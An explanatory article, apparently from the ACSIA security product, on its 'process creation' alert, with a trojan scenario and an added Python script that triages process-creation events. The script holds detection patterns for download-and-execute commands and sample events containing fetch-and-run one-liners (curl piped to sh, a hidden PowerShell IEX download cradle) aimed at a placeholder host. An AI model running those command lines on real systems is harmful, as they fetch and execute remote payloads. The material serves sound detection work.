Overview
This article will explain the ACSIA alert called "process creation".
Explaining process creation
"Process creation" refers to the operating system starting a new program or task, for example when a user launches an application, a scheduler runs a job, or one program starts another (fork()/execve() on Linux, CreateProcess on Windows). Every new process is started by an existing parent process and carries an executable image, a command line and a user account. Once created, the process becomes an active part of the operating system, running in the background or interacting with the user interface, and it can perform whatever functions its design and purpose allow. From a security standpoint the creation event is valuable because those attributes (which parent started which program, with what arguments, as which user) are recorded at one well-defined point, before the program has done anything.
Example of an attack involving "process creation":
Imagine a scenario where an attacker wants to gain unauthorized access to a company's network and, to get there, relies on creating a process on an employee's computer.
The attacker first gains a foothold on an employee's computer within the company. They use a social engineering tactic to trick the employee into clicking a malicious link in an email or opening a file attachment that contains stealthy malware, a "trojan".
As soon as the employee clicks the link or opens the attachment, the trojan is executed on the computer. Its primary goal is to gain control of the system and give the attacker a backdoor into the network.
One of the first things the trojan does is create a new process within the operating system, commonly by having the program the employee was using (the mail client or document viewer) spawn a shell or script interpreter. It does this to establish a connection to a remote command-and-control server operated by the attacker.
Once the trojan successfully creates this new process and establishes the connection, the attacker gains control over the compromised computer. From this point, the attacker can remotely access the company's network and launch further attacks, exploring the network for sensitive data or attempting to infect other devices.
Process creation was critical to the trojan's success: it is how the malware became an active part of the operating system and began its malicious activity. It is also the point at which the intrusion is most visible to a defender. The user sees nothing, and signature-based antivirus may not recognise the trojan, but the creation event itself records a parent-child relationship (a document viewer or mail client spawning a shell), a command line and a user account that are unusual for that host.
ACSIA alerts you when a process that warrants investigation is created on your infrastructure.
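The following is an added worked example, not part of the original article and not ACSIA's own detection logic. It shows the attributes an investigator looks at in a process-creation event such as the one in the scenario above, and how a handful of checks separate routine events from the ones worth an alert. The record layout, the lists of risky parents and interpreters, the regular expressions and the sample events are all assumptions constructed for illustration; the field names follow the general shape of Sysmon Event ID 1 and auditd execve records rather than any ACSIA format.

```python
"""Triage of process-creation events (added example, not ACSIA code).

Each record carries the attributes an investigator checks first: which parent
started the process, what image it is, its command line and its user account.
All events below are constructed samples, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str   # path of the process that created this one
    image: str    # path of the newly created process
    cmdline: str  # full command line of the new process
    user: str     # account the new process runs as


# Hypothetical lists for illustration; tune them to the hosts you monitor.
# Programs that handle untrusted input and should rarely start a shell.
RISKY_PARENTS = {
    "evince", "libreoffice", "thunderbird", "winword.exe", "excel.exe",
    "outlook.exe", "acrord32.exe", "apache2", "nginx", "php-fpm",
}
# Shells and script interpreters an attacker typically needs next.
INTERPRETERS = {
    "sh", "bash", "dash", "zsh", "python3", "perl",
    "cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe",
}
# "Download" and "execute" tokens; a command line containing both is a
# classic staging pattern for fetching a second stage from a C2 server.
DOWNLOADERS = re.compile(
    r"\b(curl|wget|certutil|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I)
EXECUTORS = re.compile(
    r"(\|\s*(ba|da|z)?sh\b|\bIEX\b|Invoke-Expression|-urlcache|\bchmod\s+\+x\b)", re.I)
# Locations from which legitimate software is rarely executed.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "\\temp\\")


def basename(path: str) -> str:
    """Last path component, lower-cased, for both / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event deserves investigation (empty = routine)."""
    reasons = []
    parent, child = basename(ev.parent), basename(ev.image)
    if parent in RISKY_PARENTS and child in INTERPRETERS:
        reasons.append(f"{parent} spawned {child}")
    if DOWNLOADERS.search(ev.cmdline) and EXECUTORS.search(ev.cmdline):
        reasons.append("download-and-execute command line")
    if any(t in ev.image.lower() for t in TEMP_DIRS):
        reasons.append("binary executed from a temporary directory")
    return reasons


def scan(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Filter a batch of events down to the ones worth an analyst's time."""
    flagged = []
    for ev in events:
        reasons = triage(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample events: the first two mirror the trojan scenario (a
# document viewer / Word spawning a shell that pulls a second stage), the
# third is a web shell on a server, the fourth a dropped binary run from
# /tmp, and the last two are routine administrative activity.
SAMPLE_EVENTS = [
    ProcessEvent("/usr/bin/evince", "/bin/sh",
                 "sh -c 'curl -s http://198.51.100.7/s | sh'", "alice"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://198.51.100.7/a')\"", r"CORP\alice"),
    ProcessEvent("/usr/sbin/apache2", "/bin/sh", "sh -c 'id; uname -a'", "www-data"),
    ProcessEvent("/bin/bash", "/tmp/.x/update", "/tmp/.x/update -d", "www-data"),
    ProcessEvent("/usr/sbin/sshd", "/bin/bash", "bash -c 'ls -la /var/log'", "bob"),
    ProcessEvent("/usr/sbin/cron", "/usr/bin/python3", "python3 /opt/backup/run.py", "root"),
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(f"{ev.user}: {basename(ev.parent)} -> {ev.cmdline}")
        for r in reasons:
            print("   ", r)
```

Running the block as a script prints the four flagged events with their reasons; the interactive SSH shell and the cron-driven backup produce none, which is the difference between "a process was created" and "a process to be investigated was created". The three checks deliberately look at different attributes of the same event (parent-child pair, command line, image path) because an attacker can dodge any one of them, for instance by renaming a dropped binary or splitting the download and the execution into two separate processes; in practice the lists are tuned per environment and complemented by file hashes and the user account the process runs as.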